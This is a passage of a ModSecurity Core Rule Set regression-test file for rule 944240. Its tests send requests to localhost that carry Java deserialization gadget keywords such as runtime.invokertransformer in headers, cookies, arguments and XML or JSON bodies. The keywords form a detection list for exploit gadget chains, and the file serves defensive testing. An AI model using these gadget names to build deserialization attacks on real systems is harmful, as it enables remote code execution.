"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-25 - desc: "Cookie name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-26 - desc: "Request header test includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-27 - desc: "XML attribute value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-28 - desc: "XML element value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-29 - desc: "Nested XML element value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-30 - desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - 
data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-31 - desc: "Content-Type application/json arg value includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatefactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-32 - desc: "Content-Type application/json arg name includes keyword runtime.instantiatefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-33 - desc: "Argument test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: 
"test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-34 - desc: "Argument name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-35 - desc: "Cookie test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-36 - desc: "Cookie name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatetransformer=test - method: "POST" - 
version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-37 - desc: "Request header test includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatetransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-38 - desc: "XML attribute value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-39 - desc: "XML element value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id 
\"944240\"" - - - - test_title: 944240-40 - desc: "Nested XML element value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-41 - desc: "Content-Type text/plain includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.instantiatetransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-42 - desc: "Content-Type application/json arg value includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.instantiatetransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-43 - 
desc: "Content-Type application/json arg name includes keyword runtime.instantiatetransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-44 - desc: "Argument test includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-45 - desc: "Argument name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-46 - desc: "Cookie test includes keyword 
runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-47 - desc: "Cookie name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-48 - desc: "Request header test includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-49 - desc: "XML attribute value includes 
keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-50 - desc: "XML element value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-51 - desc: "Nested XML element value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-52 - desc: "Content-Type text/plain includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-53 - desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-54 - desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-55 - desc: "Argument test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity 
CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-56 - desc: "Argument name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-57 - desc: "Cookie test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-58 - desc: "Cookie name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-59 - desc: "Request header test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-60 - desc: "XML attribute value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-61 - desc: "XML element value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-62 - desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-63 - desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-64 - desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-65 - desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-66 - desc: "Argument test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-67 - desc: "Argument name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-68 - desc: "Cookie test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-69 - desc: "Cookie name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: 